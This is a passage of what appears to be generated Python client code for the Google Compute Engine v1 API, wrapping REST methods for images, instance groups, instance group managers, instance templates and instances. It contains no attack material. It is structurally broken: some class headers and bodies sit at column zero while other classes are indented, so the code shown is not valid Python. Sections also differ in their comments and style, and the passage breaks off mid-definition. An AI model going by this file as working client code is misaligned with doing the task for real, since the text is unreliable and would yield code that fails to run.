        method_id=u'compute.images.get',
        http_method=u'GET',
        relative_path=u'projects/{project}/global/images/{image}',
        ordered_params=[u'project', u'image'],
        path_params=[u'image', u'project'],
        query_params=[],
        request_field='',
        request_type_name=u'ComputeImagesGetRequest',
        response_type_name=u'Image',
        supports_download=False,
    )

    def GetFromFamily(self, request, global_params=None):
        """Returns the latest image that is part of an image family and is not deprecated.

        Args:
          request: (ComputeImagesGetFromFamilyRequest) input message
          global_params: (StandardQueryParameters, default: None) global arguments

        Returns:
          (Image) The response message.
        """
        return self._RunMethod(
            self.GetMethodConfig('GetFromFamily'), request,
            global_params=global_params)

    GetFromFamily.method_config = lambda: base_api.ApiMethodInfo(
        method_id=u'compute.images.getFromFamily',
        http_method=u'GET',
        relative_path=u'projects/{project}/global/images/family/{family}',
        ordered_params=[u'project', u'family'],
        path_params=[u'family', u'project'],
        query_params=[],
        request_field='',
        request_type_name=u'ComputeImagesGetFromFamilyRequest',
        response_type_name=u'Image',
        supports_download=False,
    )

    def Insert(self, request, global_params=None):
        """Creates an image in the specified project using the data included in the request.

        Args:
          request: (ComputeImagesInsertRequest) input message
          global_params: (StandardQueryParameters, default: None) global arguments

        Returns:
          (Operation) The response message.
        """
        return self._RunMethod(
            self.GetMethodConfig('Insert'), request,
            global_params=global_params)

    Insert.method_config = lambda: base_api.ApiMethodInfo(
        method_id=u'compute.images.insert',
        http_method=u'POST',
        relative_path=u'projects/{project}/global/images',
        ordered_params=[u'project'],
        path_params=[u'project'],
        query_params=[u'forceCreate'],
        request_field=u'image',
        request_type_name=u'ComputeImagesInsertRequest',
        response_type_name=u'Operation',
        supports_download=False,
    )

    def List(self, request, global_params=None):
        """Retrieves the list of private images available to the specified project.

        Private images are images you create that belong to your project. This
        method does not get any images that belong to other projects, including
        publicly-available images, like Debian 8. If you want to get a list of
        publicly-available images, use this method to make a request to the
        respective image project, such as debian-cloud or windows-cloud.

        Args:
          request: (ComputeImagesListRequest) input message
          global_params: (StandardQueryParameters, default: None) global arguments

        Returns:
          (ImageList) The response message.
        """
        return self._RunMethod(
            self.GetMethodConfig('List'), request,
            global_params=global_params)

    List.method_config = lambda: base_api.ApiMethodInfo(
        method_id=u'compute.images.list',
        http_method=u'GET',
        relative_path=u'projects/{project}/global/images',
        ordered_params=[u'project'],
        path_params=[u'project'],
        query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
        request_field='',
        request_type_name=u'ComputeImagesListRequest',
        response_type_name=u'ImageList',
        supports_download=False,
    )

    def SetLabels(self, request, global_params=None):
        """Sets the labels on an image.

        To learn more about labels, read the Labeling Resources documentation.

        Args:
          request: (ComputeImagesSetLabelsRequest) input message
          global_params: (StandardQueryParameters, default: None) global arguments

        Returns:
          (Operation) The response message.
        """
        return self._RunMethod(
            self.GetMethodConfig('SetLabels'), request,
            global_params=global_params)

    SetLabels.method_config = lambda: base_api.ApiMethodInfo(
        method_id=u'compute.images.setLabels',
        http_method=u'POST',
        relative_path=u'projects/{project}/global/images/{resource}/setLabels',
        ordered_params=[u'project', u'resource'],
        path_params=[u'project', u'resource'],
        query_params=[],
        request_field=u'globalSetLabelsRequest',
        request_type_name=u'ComputeImagesSetLabelsRequest',
        response_type_name=u'Operation',
        supports_download=False,
    )
class InstanceGroupManagersService(base_api.BaseApiService):
"""Service class for the instanceGroupManagers resource."""
_NAME = u'instanceGroupManagers'
def __init__(self, client):
    """Initialize the service and register (no) upload configurations."""
    super(ComputeV1.InstanceGroupManagersService, self).__init__(client)
    self._upload_configs = {}
def AbandonInstances(self, request, global_params=None):
    """Schedules a group action to remove the specified instances from the managed instance group.

    Abandoning an instance does not delete the instance, but it does remove
    the instance from any target pools that are applied by the managed
    instance group. This method reduces the targetSize of the managed
    instance group by the number of instances that you abandon. This
    operation is marked as DONE when the action is scheduled even if the
    instances have not yet been removed from the group. You must separately
    verify the status of the abandoning action with the
    listmanagedinstances method.

    If the group is part of a backend service that has enabled connection
    draining, it can take up to 60 seconds after the connection draining
    duration has elapsed before the VM instance is removed or deleted.

    You can specify a maximum of 1000 instances with this method per
    request.

    Args:
      request: (ComputeInstanceGroupManagersAbandonInstancesRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments

    Returns:
      (Operation) The response message.
    """
    return self._RunMethod(
        self.GetMethodConfig('AbandonInstances'), request,
        global_params=global_params)

AbandonInstances.method_config = lambda: base_api.ApiMethodInfo(
    method_id=u'compute.instanceGroupManagers.abandonInstances',
    http_method=u'POST',
    relative_path=u'projects/{project}/zones/{zone}/instanceGroupManagers/{instanceGroupManager}/abandonInstances',
    ordered_params=[u'project', u'zone', u'instanceGroupManager'],
    path_params=[u'instanceGroupManager', u'project', u'zone'],
    query_params=[],
    request_field=u'instanceGroupManagersAbandonInstancesRequest',
    request_type_name=u'ComputeInstanceGroupManagersAbandonInstancesRequest',
    response_type_name=u'Operation',
    supports_download=False,
)
def AggregatedList(self, request, global_params=None):
    """Retrieves the list of managed instance groups and groups them by zone.

    Args:
      request: (ComputeInstanceGroupManagersAggregatedListRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments

    Returns:
      (InstanceGroupManagerAggregatedList) The response message.
    """
    return self._RunMethod(
        self.GetMethodConfig('AggregatedList'), request,
        global_params=global_params)

AggregatedList.method_config = lambda: base_api.ApiMethodInfo(
    method_id=u'compute.instanceGroupManagers.aggregatedList',
    http_method=u'GET',
    relative_path=u'projects/{project}/aggregated/instanceGroupManagers',
    ordered_params=[u'project'],
    path_params=[u'project'],
    query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
    request_field='',
    request_type_name=u'ComputeInstanceGroupManagersAggregatedListRequest',
    response_type_name=u'InstanceGroupManagerAggregatedList',
    supports_download=False,
)
def Delete(self, request, global_params=None):
    """Deletes the specified managed instance group and all of the instances in that group.

    Note that the instance group must not belong to a backend service. Read
    Deleting an instance group for more information.

    Args:
      request: (ComputeInstanceGroupManagersDeleteRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments

    Returns:
      (Operation) The response message.
    """
    return self._RunMethod(
        self.GetMethodConfig('Delete'), request,
        global_params=global_params)

Delete.method_config = lambda: base_api.ApiMethodInfo(
    method_id=u'compute.instanceGroupManagers.delete',
    http_method=u'DELETE',
    relative_path=u'projects/{project}/zones/{zone}/instanceGroupManagers/{instanceGroupManager}',
    ordered_params=[u'project', u'zone', u'instanceGroupManager'],
    path_params=[u'instanceGroupManager', u'project', u'zone'],
    query_params=[],
    request_field='',
    request_type_name=u'ComputeInstanceGroupManagersDeleteRequest',
    response_type_name=u'Operation',
    supports_download=False,
)
def DeleteInstances(self, request, global_params=None):
    """Schedules a group action to delete the specified instances in the managed instance group.

    The instances are also removed from any target pools of which they were
    a member. This method reduces the targetSize of the managed instance
    group by the number of instances that you delete. This operation is
    marked as DONE when the action is scheduled even if the instances are
    still being deleted. You must separately verify the status of the
    deleting action with the listmanagedinstances method.

    If the group is part of a backend service that has enabled connection
    draining, it can take up to 60 seconds after the connection draining
    duration has elapsed before the VM instance is removed or deleted.

    You can specify a maximum of 1000 instances with this method per
    request.

    Args:
      request: (ComputeInstanceGroupManagersDeleteInstancesRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments

    Returns:
      (Operation) The response message.
    """
    return self._RunMethod(
        self.GetMethodConfig('DeleteInstances'), request,
        global_params=global_params)

DeleteInstances.method_config = lambda: base_api.ApiMethodInfo(
    method_id=u'compute.instanceGroupManagers.deleteInstances',
    http_method=u'POST',
    relative_path=u'projects/{project}/zones/{zone}/instanceGroupManagers/{instanceGroupManager}/deleteInstances',
    ordered_params=[u'project', u'zone', u'instanceGroupManager'],
    path_params=[u'instanceGroupManager', u'project', u'zone'],
    query_params=[],
    request_field=u'instanceGroupManagersDeleteInstancesRequest',
    request_type_name=u'ComputeInstanceGroupManagersDeleteInstancesRequest',
    response_type_name=u'Operation',
    supports_download=False,
)
def Get(self, request, global_params=None):
    """Returns all of the details about the specified managed instance group.

    Get a list of available managed instance groups by making a list()
    request.

    Args:
      request: (ComputeInstanceGroupManagersGetRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments

    Returns:
      (InstanceGroupManager) The response message.
    """
    return self._RunMethod(
        self.GetMethodConfig('Get'), request,
        global_params=global_params)

Get.method_config = lambda: base_api.ApiMethodInfo(
    method_id=u'compute.instanceGroupManagers.get',
    http_method=u'GET',
    relative_path=u'projects/{project}/zones/{zone}/instanceGroupManagers/{instanceGroupManager}',
    ordered_params=[u'project', u'zone', u'instanceGroupManager'],
    path_params=[u'instanceGroupManager', u'project', u'zone'],
    query_params=[],
    request_field='',
    request_type_name=u'ComputeInstanceGroupManagersGetRequest',
    response_type_name=u'InstanceGroupManager',
    supports_download=False,
)
def Insert(self, request, global_params=None):
    """Creates a managed instance group using the information that you specify in the request.

    After the group is created, it schedules an action to create instances
    in the group using the specified instance template. This operation is
    marked as DONE when the group is created even if the instances in the
    group have not yet been created. You must separately verify the status
    of the individual instances with the listmanagedinstances method.

    A managed instance group can have up to 1000 VM instances per group.
    Please contact Cloud Support if you need an increase in this limit.

    Args:
      request: (ComputeInstanceGroupManagersInsertRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments

    Returns:
      (Operation) The response message.
    """
    return self._RunMethod(
        self.GetMethodConfig('Insert'), request,
        global_params=global_params)

Insert.method_config = lambda: base_api.ApiMethodInfo(
    method_id=u'compute.instanceGroupManagers.insert',
    http_method=u'POST',
    relative_path=u'projects/{project}/zones/{zone}/instanceGroupManagers',
    ordered_params=[u'project', u'zone'],
    path_params=[u'project', u'zone'],
    query_params=[],
    request_field=u'instanceGroupManager',
    request_type_name=u'ComputeInstanceGroupManagersInsertRequest',
    response_type_name=u'Operation',
    supports_download=False,
)
def List(self, request, global_params=None):
    """Retrieves a list of managed instance groups that are contained within the specified project and zone.

    Args:
      request: (ComputeInstanceGroupManagersListRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments

    Returns:
      (InstanceGroupManagerList) The response message.
    """
    # Resolve the per-method wire configuration, then issue the HTTP call.
    return self._RunMethod(
        self.GetMethodConfig('List'), request, global_params=global_params)

List.method_config = lambda: base_api.ApiMethodInfo(
    http_method=u'GET',
    method_id=u'compute.instanceGroupManagers.list',
    ordered_params=[u'project', u'zone'],
    path_params=[u'project', u'zone'],
    query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
    relative_path=u'projects/{project}/zones/{zone}/instanceGroupManagers',
    request_field='',
    request_type_name=u'ComputeInstanceGroupManagersListRequest',
    response_type_name=u'InstanceGroupManagerList',
    supports_download=False,
)
def ListManagedInstances(self, request, global_params=None):
    """Lists all of the instances in the managed instance group. Each instance in the list has a currentAction, which indicates the action that the managed instance group is performing on the instance. For example, if the group is still creating an instance, the currentAction is CREATING. If a previous action failed, the list displays the errors for that failed action.

    Args:
      request: (ComputeInstanceGroupManagersListManagedInstancesRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments

    Returns:
      (InstanceGroupManagersListManagedInstancesResponse) The response message.
    """
    # Resolve the per-method wire configuration, then issue the HTTP call.
    return self._RunMethod(
        self.GetMethodConfig('ListManagedInstances'), request,
        global_params=global_params)

# NOTE(review): this method uses snake_case u'order_by' while sibling list
# methods use u'orderBy'; this appears to come straight from the generated
# discovery config for compute.instanceGroupManagers.listManagedInstances —
# confirm against the discovery document before "fixing" it.
ListManagedInstances.method_config = lambda: base_api.ApiMethodInfo(
    http_method=u'POST',
    method_id=u'compute.instanceGroupManagers.listManagedInstances',
    ordered_params=[u'project', u'zone', u'instanceGroupManager'],
    path_params=[u'instanceGroupManager', u'project', u'zone'],
    query_params=[u'filter', u'maxResults', u'order_by', u'pageToken'],
    relative_path=u'projects/{project}/zones/{zone}/instanceGroupManagers/{instanceGroupManager}/listManagedInstances',
    request_field='',
    request_type_name=u'ComputeInstanceGroupManagersListManagedInstancesRequest',
    response_type_name=u'InstanceGroupManagersListManagedInstancesResponse',
    supports_download=False,
)
def RecreateInstances(self, request, global_params=None):
    """Schedules a group action to recreate the specified instances in the managed instance group. The instances are deleted and recreated using the current instance template for the managed instance group. This operation is marked as DONE when the action is scheduled even if the instances have not yet been recreated. You must separately verify the status of the recreating action with the listmanagedinstances method.

    If the group is part of a backend service that has enabled connection draining, it can take up to 60 seconds after the connection draining duration has elapsed before the VM instance is removed or deleted.

    You can specify a maximum of 1000 instances with this method per request.

    Args:
      request: (ComputeInstanceGroupManagersRecreateInstancesRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments

    Returns:
      (Operation) The response message.
    """
    # Resolve the per-method wire configuration, then issue the HTTP call.
    return self._RunMethod(
        self.GetMethodConfig('RecreateInstances'), request,
        global_params=global_params)

RecreateInstances.method_config = lambda: base_api.ApiMethodInfo(
    http_method=u'POST',
    method_id=u'compute.instanceGroupManagers.recreateInstances',
    ordered_params=[u'project', u'zone', u'instanceGroupManager'],
    path_params=[u'instanceGroupManager', u'project', u'zone'],
    query_params=[],
    relative_path=u'projects/{project}/zones/{zone}/instanceGroupManagers/{instanceGroupManager}/recreateInstances',
    request_field=u'instanceGroupManagersRecreateInstancesRequest',
    request_type_name=u'ComputeInstanceGroupManagersRecreateInstancesRequest',
    response_type_name=u'Operation',
    supports_download=False,
)
def Resize(self, request, global_params=None):
    """Resizes the managed instance group. If you increase the size, the group creates new instances using the current instance template. If you decrease the size, the group deletes instances. The resize operation is marked DONE when the resize actions are scheduled even if the group has not yet added or deleted any instances. You must separately verify the status of the creating or deleting actions with the listmanagedinstances method.

    If the group is part of a backend service that has enabled connection draining, it can take up to 60 seconds after the connection draining duration has elapsed before the VM instance is removed or deleted.

    Args:
      request: (ComputeInstanceGroupManagersResizeRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments

    Returns:
      (Operation) The response message.
    """
    # Resolve the per-method wire configuration, then issue the HTTP call.
    return self._RunMethod(
        self.GetMethodConfig('Resize'), request, global_params=global_params)

Resize.method_config = lambda: base_api.ApiMethodInfo(
    http_method=u'POST',
    method_id=u'compute.instanceGroupManagers.resize',
    ordered_params=[u'project', u'zone', u'instanceGroupManager', u'size'],
    path_params=[u'instanceGroupManager', u'project', u'zone'],
    query_params=[u'size'],
    relative_path=u'projects/{project}/zones/{zone}/instanceGroupManagers/{instanceGroupManager}/resize',
    request_field='',
    request_type_name=u'ComputeInstanceGroupManagersResizeRequest',
    response_type_name=u'Operation',
    supports_download=False,
)
def SetInstanceTemplate(self, request, global_params=None):
    """Specifies the instance template to use when creating new instances in this group. The templates for existing instances in the group do not change unless you recreate them.

    Args:
      request: (ComputeInstanceGroupManagersSetInstanceTemplateRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments

    Returns:
      (Operation) The response message.
    """
    # Resolve the per-method wire configuration, then issue the HTTP call.
    return self._RunMethod(
        self.GetMethodConfig('SetInstanceTemplate'), request,
        global_params=global_params)

SetInstanceTemplate.method_config = lambda: base_api.ApiMethodInfo(
    http_method=u'POST',
    method_id=u'compute.instanceGroupManagers.setInstanceTemplate',
    ordered_params=[u'project', u'zone', u'instanceGroupManager'],
    path_params=[u'instanceGroupManager', u'project', u'zone'],
    query_params=[],
    relative_path=u'projects/{project}/zones/{zone}/instanceGroupManagers/{instanceGroupManager}/setInstanceTemplate',
    request_field=u'instanceGroupManagersSetInstanceTemplateRequest',
    request_type_name=u'ComputeInstanceGroupManagersSetInstanceTemplateRequest',
    response_type_name=u'Operation',
    supports_download=False,
)
def SetTargetPools(self, request, global_params=None):
    """Modifies the target pools to which all instances in this managed instance group are assigned. The target pools automatically apply to all of the instances in the managed instance group. This operation is marked DONE when you make the request even if the instances have not yet been added to their target pools. The change might take some time to apply to all of the instances in the group depending on the size of the group.

    Args:
      request: (ComputeInstanceGroupManagersSetTargetPoolsRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments

    Returns:
      (Operation) The response message.
    """
    # Resolve the per-method wire configuration, then issue the HTTP call.
    return self._RunMethod(
        self.GetMethodConfig('SetTargetPools'), request,
        global_params=global_params)

SetTargetPools.method_config = lambda: base_api.ApiMethodInfo(
    http_method=u'POST',
    method_id=u'compute.instanceGroupManagers.setTargetPools',
    ordered_params=[u'project', u'zone', u'instanceGroupManager'],
    path_params=[u'instanceGroupManager', u'project', u'zone'],
    query_params=[],
    relative_path=u'projects/{project}/zones/{zone}/instanceGroupManagers/{instanceGroupManager}/setTargetPools',
    request_field=u'instanceGroupManagersSetTargetPoolsRequest',
    request_type_name=u'ComputeInstanceGroupManagersSetTargetPoolsRequest',
    response_type_name=u'Operation',
    supports_download=False,
)
class InstanceGroupsService(base_api.BaseApiService):
    """Service class for the instanceGroups resource.

    Each public method wraps one REST method of the Compute v1
    instanceGroups collection: it resolves the generated per-method wire
    configuration and delegates the actual HTTP exchange to the shared
    ``_RunMethod`` machinery on the base service.
    """

    _NAME = u'instanceGroups'

    def __init__(self, client):
        super(ComputeV1.InstanceGroupsService, self).__init__(client)
        # No media-upload methods on this resource.
        self._upload_configs = {}

    def AddInstances(self, request, global_params=None):
        """Adds a list of instances to the specified instance group. All of the instances in the instance group must be in the same network/subnetwork. Read Adding instances for more information.

        Args:
          request: (ComputeInstanceGroupsAddInstancesRequest) input message
          global_params: (StandardQueryParameters, default: None) global arguments

        Returns:
          (Operation) The response message.
        """
        return self._RunMethod(
            self.GetMethodConfig('AddInstances'), request,
            global_params=global_params)

    AddInstances.method_config = lambda: base_api.ApiMethodInfo(
        http_method=u'POST',
        method_id=u'compute.instanceGroups.addInstances',
        ordered_params=[u'project', u'zone', u'instanceGroup'],
        path_params=[u'instanceGroup', u'project', u'zone'],
        query_params=[],
        relative_path=u'projects/{project}/zones/{zone}/instanceGroups/{instanceGroup}/addInstances',
        request_field=u'instanceGroupsAddInstancesRequest',
        request_type_name=u'ComputeInstanceGroupsAddInstancesRequest',
        response_type_name=u'Operation',
        supports_download=False,
    )

    def AggregatedList(self, request, global_params=None):
        """Retrieves the list of instance groups and sorts them by zone.

        Args:
          request: (ComputeInstanceGroupsAggregatedListRequest) input message
          global_params: (StandardQueryParameters, default: None) global arguments

        Returns:
          (InstanceGroupAggregatedList) The response message.
        """
        return self._RunMethod(
            self.GetMethodConfig('AggregatedList'), request,
            global_params=global_params)

    AggregatedList.method_config = lambda: base_api.ApiMethodInfo(
        http_method=u'GET',
        method_id=u'compute.instanceGroups.aggregatedList',
        ordered_params=[u'project'],
        path_params=[u'project'],
        query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
        relative_path=u'projects/{project}/aggregated/instanceGroups',
        request_field='',
        request_type_name=u'ComputeInstanceGroupsAggregatedListRequest',
        response_type_name=u'InstanceGroupAggregatedList',
        supports_download=False,
    )

    def Delete(self, request, global_params=None):
        """Deletes the specified instance group. The instances in the group are not deleted. Note that instance group must not belong to a backend service. Read Deleting an instance group for more information.

        Args:
          request: (ComputeInstanceGroupsDeleteRequest) input message
          global_params: (StandardQueryParameters, default: None) global arguments

        Returns:
          (Operation) The response message.
        """
        return self._RunMethod(
            self.GetMethodConfig('Delete'), request,
            global_params=global_params)

    Delete.method_config = lambda: base_api.ApiMethodInfo(
        http_method=u'DELETE',
        method_id=u'compute.instanceGroups.delete',
        ordered_params=[u'project', u'zone', u'instanceGroup'],
        path_params=[u'instanceGroup', u'project', u'zone'],
        query_params=[],
        relative_path=u'projects/{project}/zones/{zone}/instanceGroups/{instanceGroup}',
        request_field='',
        request_type_name=u'ComputeInstanceGroupsDeleteRequest',
        response_type_name=u'Operation',
        supports_download=False,
    )

    def Get(self, request, global_params=None):
        """Returns the specified instance group. Get a list of available instance groups by making a list() request.

        Args:
          request: (ComputeInstanceGroupsGetRequest) input message
          global_params: (StandardQueryParameters, default: None) global arguments

        Returns:
          (InstanceGroup) The response message.
        """
        return self._RunMethod(
            self.GetMethodConfig('Get'), request,
            global_params=global_params)

    Get.method_config = lambda: base_api.ApiMethodInfo(
        http_method=u'GET',
        method_id=u'compute.instanceGroups.get',
        ordered_params=[u'project', u'zone', u'instanceGroup'],
        path_params=[u'instanceGroup', u'project', u'zone'],
        query_params=[],
        relative_path=u'projects/{project}/zones/{zone}/instanceGroups/{instanceGroup}',
        request_field='',
        request_type_name=u'ComputeInstanceGroupsGetRequest',
        response_type_name=u'InstanceGroup',
        supports_download=False,
    )

    def Insert(self, request, global_params=None):
        """Creates an instance group in the specified project using the parameters that are included in the request.

        Args:
          request: (ComputeInstanceGroupsInsertRequest) input message
          global_params: (StandardQueryParameters, default: None) global arguments

        Returns:
          (Operation) The response message.
        """
        return self._RunMethod(
            self.GetMethodConfig('Insert'), request,
            global_params=global_params)

    Insert.method_config = lambda: base_api.ApiMethodInfo(
        http_method=u'POST',
        method_id=u'compute.instanceGroups.insert',
        ordered_params=[u'project', u'zone'],
        path_params=[u'project', u'zone'],
        query_params=[],
        relative_path=u'projects/{project}/zones/{zone}/instanceGroups',
        request_field=u'instanceGroup',
        request_type_name=u'ComputeInstanceGroupsInsertRequest',
        response_type_name=u'Operation',
        supports_download=False,
    )

    def List(self, request, global_params=None):
        """Retrieves the list of instance groups that are located in the specified project and zone.

        Args:
          request: (ComputeInstanceGroupsListRequest) input message
          global_params: (StandardQueryParameters, default: None) global arguments

        Returns:
          (InstanceGroupList) The response message.
        """
        return self._RunMethod(
            self.GetMethodConfig('List'), request,
            global_params=global_params)

    List.method_config = lambda: base_api.ApiMethodInfo(
        http_method=u'GET',
        method_id=u'compute.instanceGroups.list',
        ordered_params=[u'project', u'zone'],
        path_params=[u'project', u'zone'],
        query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
        relative_path=u'projects/{project}/zones/{zone}/instanceGroups',
        request_field='',
        request_type_name=u'ComputeInstanceGroupsListRequest',
        response_type_name=u'InstanceGroupList',
        supports_download=False,
    )

    def ListInstances(self, request, global_params=None):
        """Lists the instances in the specified instance group.

        Args:
          request: (ComputeInstanceGroupsListInstancesRequest) input message
          global_params: (StandardQueryParameters, default: None) global arguments

        Returns:
          (InstanceGroupsListInstances) The response message.
        """
        return self._RunMethod(
            self.GetMethodConfig('ListInstances'), request,
            global_params=global_params)

    ListInstances.method_config = lambda: base_api.ApiMethodInfo(
        http_method=u'POST',
        method_id=u'compute.instanceGroups.listInstances',
        ordered_params=[u'project', u'zone', u'instanceGroup'],
        path_params=[u'instanceGroup', u'project', u'zone'],
        query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
        relative_path=u'projects/{project}/zones/{zone}/instanceGroups/{instanceGroup}/listInstances',
        request_field=u'instanceGroupsListInstancesRequest',
        request_type_name=u'ComputeInstanceGroupsListInstancesRequest',
        response_type_name=u'InstanceGroupsListInstances',
        supports_download=False,
    )

    def RemoveInstances(self, request, global_params=None):
        """Removes one or more instances from the specified instance group, but does not delete those instances.

        If the group is part of a backend service that has enabled connection draining, it can take up to 60 seconds after the connection draining duration before the VM instance is removed or deleted.

        Args:
          request: (ComputeInstanceGroupsRemoveInstancesRequest) input message
          global_params: (StandardQueryParameters, default: None) global arguments

        Returns:
          (Operation) The response message.
        """
        return self._RunMethod(
            self.GetMethodConfig('RemoveInstances'), request,
            global_params=global_params)

    RemoveInstances.method_config = lambda: base_api.ApiMethodInfo(
        http_method=u'POST',
        method_id=u'compute.instanceGroups.removeInstances',
        ordered_params=[u'project', u'zone', u'instanceGroup'],
        path_params=[u'instanceGroup', u'project', u'zone'],
        query_params=[],
        relative_path=u'projects/{project}/zones/{zone}/instanceGroups/{instanceGroup}/removeInstances',
        request_field=u'instanceGroupsRemoveInstancesRequest',
        request_type_name=u'ComputeInstanceGroupsRemoveInstancesRequest',
        response_type_name=u'Operation',
        supports_download=False,
    )

    def SetNamedPorts(self, request, global_params=None):
        """Sets the named ports for the specified instance group.

        Args:
          request: (ComputeInstanceGroupsSetNamedPortsRequest) input message
          global_params: (StandardQueryParameters, default: None) global arguments

        Returns:
          (Operation) The response message.
        """
        return self._RunMethod(
            self.GetMethodConfig('SetNamedPorts'), request,
            global_params=global_params)

    SetNamedPorts.method_config = lambda: base_api.ApiMethodInfo(
        http_method=u'POST',
        method_id=u'compute.instanceGroups.setNamedPorts',
        ordered_params=[u'project', u'zone', u'instanceGroup'],
        path_params=[u'instanceGroup', u'project', u'zone'],
        query_params=[],
        relative_path=u'projects/{project}/zones/{zone}/instanceGroups/{instanceGroup}/setNamedPorts',
        request_field=u'instanceGroupsSetNamedPortsRequest',
        request_type_name=u'ComputeInstanceGroupsSetNamedPortsRequest',
        response_type_name=u'Operation',
        supports_download=False,
    )
class InstanceTemplatesService(base_api.BaseApiService):
    """Service class for the instanceTemplates resource.

    Each public method wraps one REST method of the Compute v1
    instanceTemplates collection, delegating the HTTP exchange to the
    shared ``_RunMethod`` machinery on the base service.
    """

    _NAME = u'instanceTemplates'

    def __init__(self, client):
        super(ComputeV1.InstanceTemplatesService, self).__init__(client)
        # No media-upload methods on this resource.
        self._upload_configs = {}

    def Delete(self, request, global_params=None):
        """Deletes the specified instance template. If you delete an instance template that is being referenced from another instance group, the instance group will not be able to create or recreate virtual machine instances. Deleting an instance template is permanent and cannot be undone.

        Args:
          request: (ComputeInstanceTemplatesDeleteRequest) input message
          global_params: (StandardQueryParameters, default: None) global arguments

        Returns:
          (Operation) The response message.
        """
        return self._RunMethod(
            self.GetMethodConfig('Delete'), request,
            global_params=global_params)

    Delete.method_config = lambda: base_api.ApiMethodInfo(
        http_method=u'DELETE',
        method_id=u'compute.instanceTemplates.delete',
        ordered_params=[u'project', u'instanceTemplate'],
        path_params=[u'instanceTemplate', u'project'],
        query_params=[],
        relative_path=u'projects/{project}/global/instanceTemplates/{instanceTemplate}',
        request_field='',
        request_type_name=u'ComputeInstanceTemplatesDeleteRequest',
        response_type_name=u'Operation',
        supports_download=False,
    )

    def Get(self, request, global_params=None):
        """Returns the specified instance template. Get a list of available instance templates by making a list() request.

        Args:
          request: (ComputeInstanceTemplatesGetRequest) input message
          global_params: (StandardQueryParameters, default: None) global arguments

        Returns:
          (InstanceTemplate) The response message.
        """
        return self._RunMethod(
            self.GetMethodConfig('Get'), request,
            global_params=global_params)

    Get.method_config = lambda: base_api.ApiMethodInfo(
        http_method=u'GET',
        method_id=u'compute.instanceTemplates.get',
        ordered_params=[u'project', u'instanceTemplate'],
        path_params=[u'instanceTemplate', u'project'],
        query_params=[],
        relative_path=u'projects/{project}/global/instanceTemplates/{instanceTemplate}',
        request_field='',
        request_type_name=u'ComputeInstanceTemplatesGetRequest',
        response_type_name=u'InstanceTemplate',
        supports_download=False,
    )

    def Insert(self, request, global_params=None):
        """Creates an instance template in the specified project using the data that is included in the request. If you are creating a new template to update an existing instance group, your new instance template must use the same network or, if applicable, the same subnetwork as the original template.

        Args:
          request: (ComputeInstanceTemplatesInsertRequest) input message
          global_params: (StandardQueryParameters, default: None) global arguments

        Returns:
          (Operation) The response message.
        """
        return self._RunMethod(
            self.GetMethodConfig('Insert'), request,
            global_params=global_params)

    Insert.method_config = lambda: base_api.ApiMethodInfo(
        http_method=u'POST',
        method_id=u'compute.instanceTemplates.insert',
        ordered_params=[u'project'],
        path_params=[u'project'],
        query_params=[],
        relative_path=u'projects/{project}/global/instanceTemplates',
        request_field=u'instanceTemplate',
        request_type_name=u'ComputeInstanceTemplatesInsertRequest',
        response_type_name=u'Operation',
        supports_download=False,
    )

    def List(self, request, global_params=None):
        """Retrieves a list of instance templates that are contained within the specified project and zone.

        Args:
          request: (ComputeInstanceTemplatesListRequest) input message
          global_params: (StandardQueryParameters, default: None) global arguments

        Returns:
          (InstanceTemplateList) The response message.
        """
        return self._RunMethod(
            self.GetMethodConfig('List'), request,
            global_params=global_params)

    List.method_config = lambda: base_api.ApiMethodInfo(
        http_method=u'GET',
        method_id=u'compute.instanceTemplates.list',
        ordered_params=[u'project'],
        path_params=[u'project'],
        query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
        relative_path=u'projects/{project}/global/instanceTemplates',
        request_field='',
        request_type_name=u'ComputeInstanceTemplatesListRequest',
        response_type_name=u'InstanceTemplateList',
        supports_download=False,
    )
class InstancesService(base_api.BaseApiService):
"""Service class for the instances resource."""
_NAME = u'instances'
def __init__(self, client):
    """Initialize the instances service with the shared API client."""
    super(ComputeV1.InstancesService, self).__init__(client)
    # No media-upload methods on this resource.
    self._upload_configs = {}
def AddAccessConfig(self, request, global_params=None):
    """Adds an access config to an instance's network interface.

    Args:
      request: (ComputeInstancesAddAccessConfigRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments

    Returns:
      (Operation) The response message.
    """
    # Resolve the per-method wire configuration, then issue the HTTP call.
    return self._RunMethod(
        self.GetMethodConfig('AddAccessConfig'), request,
        global_params=global_params)

AddAccessConfig.method_config = lambda: base_api.ApiMethodInfo(
    http_method=u'POST',
    method_id=u'compute.instances.addAccessConfig',
    ordered_params=[u'project', u'zone', u'instance', u'networkInterface'],
    path_params=[u'instance', u'project', u'zone'],
    query_params=[u'networkInterface'],
    relative_path=u'projects/{project}/zones/{zone}/instances/{instance}/addAccessConfig',
    request_field=u'accessConfig',
    request_type_name=u'ComputeInstancesAddAccessConfigRequest',
    response_type_name=u'Operation',
    supports_download=False,
)
def AggregatedList(self, request, global_params=None):
    """Retrieves aggregated list of instances.

    Args:
      request: (ComputeInstancesAggregatedListRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments

    Returns:
      (InstanceAggregatedList) The response message.
    """
    # Resolve the per-method wire configuration, then issue the HTTP call.
    return self._RunMethod(
        self.GetMethodConfig('AggregatedList'), request,
        global_params=global_params)

AggregatedList.method_config = lambda: base_api.ApiMethodInfo(
    http_method=u'GET',
    method_id=u'compute.instances.aggregatedList',
    ordered_params=[u'project'],
    path_params=[u'project'],
    query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
